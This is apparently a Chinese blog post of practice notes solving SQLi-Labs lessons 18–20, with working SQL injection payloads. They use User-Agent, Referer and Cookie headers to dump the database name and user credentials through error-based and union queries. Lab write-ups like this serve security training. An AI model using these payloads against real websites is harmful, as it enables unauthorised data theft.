SQLi-Lab练习笔记(18-20)

最新推荐文章于 2023-07-23 10:18:16 发布
最新推荐文章于 2023-07-23 10:18:16 发布
阅读量162 收藏
点赞数
分类专栏: Web安全 文章标签: mysql 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/117427821
版权

和上一篇文章一样,这里依然使用了BurpSuite工具修改HTTP报文

Lesson 18User Agent注入

若输入的用户名和密码正确,则弹出User Agent的提示。后端对username和password都加了严格的过滤,但是发现有对数据库的插入操作和HTTP头部中的User Agent字段有关。又因为回显的信息不会经过数据库,所以只能考虑通过数据库报错带出数据库信息。
在这里插入图片描述
exp:

User-Agent: ’ or updatexml(1,concat(0x7e, database(),0x7e),1) or ’
获取数据库名称,这里没有使用注释符,因为根据后端的写法,使用注释符的前提是弄清楚插入了多少个列,否则会导致SQL语法检测不通过无法执行我们的注入代码。既然不能使用注释符,就用这种闭合单引号的方式
User-Agent: ’ or updatexml(1,concat(0x7e, (select username from users limit 0,1),0x7e),1) or’
直接查字段

Lesson 19Referer注入

参考上一题,改成了Referer头。
exp:

Referer: ’ or updatexml(1,concat(0x7e,database(),0x7e),1) or ’

在这里插入图片描述

Lesson 20Cookie注入

后端把Cookie直接获取放到SQL语句中,没有加有效的过滤,所以构造Cookie。
exp:

Cookie: uname=’ union select 1,database(),user() %23
Cookie: uname=’ union select 1,username,password from users limit 0,1 %23

在这里插入图片描述

uh3ng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
SQLi Labs Lesson18
1ame的博客
08-15 1830
Lesson - 18 POST - Header Injection - Uagent field - Error based 首先进入欢迎界面: 本节对username,password都进行了过滤。 后台过滤的php源代码: $uname = check_input($_POST['uname']); $passwd = check_input($_POST['
sqli-labs(20
jimggg的博客
03-20 254
Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)
Sqlilabs-18
KAKA的博客
07-09 878
来到了 1818 关同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
SQL注入:sqli-labs 20 Cookie注入
Zeker62的博客
08-12 353
使用前面关卡知道的账号密码:Dumb和Dumb进入 再进入的同时抓个包,发送到repeater模块 发现这个包有cookie,依据题目的题目明白这是个cookie注入: 加个单引号,报错; 报错信息我们知道这是个字符型注入,那剩下就简单多了 判断回显点 注意:Cookie语句中的注释是# ...
sqli-labs--------第18
wyzhxhn的博客
11-10 1232
sql插入语句 User-Agent
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master第20
m_ing
05-15 2143
前言:前两关我们知道了http头部注入中的user-agent和referer。今天我们来研究下cookie注入。原理原理一样,只是注入点不同 什么是cookie呢? Cookie,有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息 我们看下20关 POST交互方式下的cookie字段注入 首先看一下正常登录页面,根据提示考虑cookie注入 注入点在cookie
sqli-labs ————less -18
Fly_鹏程万里
05-12 3765
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs————less 20
Fly_鹏程万里
05-12 1628
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
sqli-labs POST (18-22)
半夜好饿的博客
05-15 454
LESS18 随手输入username和password,可以从回显中看到,当用户名密码正确时,会有如下回显,错误时只有一个‘Your IP ADDRESS is: 127.0.0.1’ 根据提示可知是user-agent的http头注入,用bp抓包,修改user-agent,得到相关信息。框住部分为增加的playload和获取的数据库名称。 ’ and extractvalue (1,conc...
sqli-lab18和22关详解
cangyu51462的博客
05-01 482
sqli-lab18和22关详解
SQLilabs的第20关(HTTP请求头-Cookie)——报错注入
qq_73393033的博客
07-23 665
我们在判断闭合方式时发现,该网站会返回报错信息,又没有回显,因此适合使用报错注入。我们在cookie的后面加上一个',返回;这说明闭合方式是'。
Sql-labs 前 20 关 通过笔记
weixin_45619494的博客
10-06 443
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八关 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
sqli-labs基础篇 第18~22关
Lucky小小吴的小屋
01-23 2392
sqli-labs基础篇 第18~22关,主要学习内容:burp抓包、数据包修改
SQLi Labs Lesson17
1ame的博客
08-15 1146
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值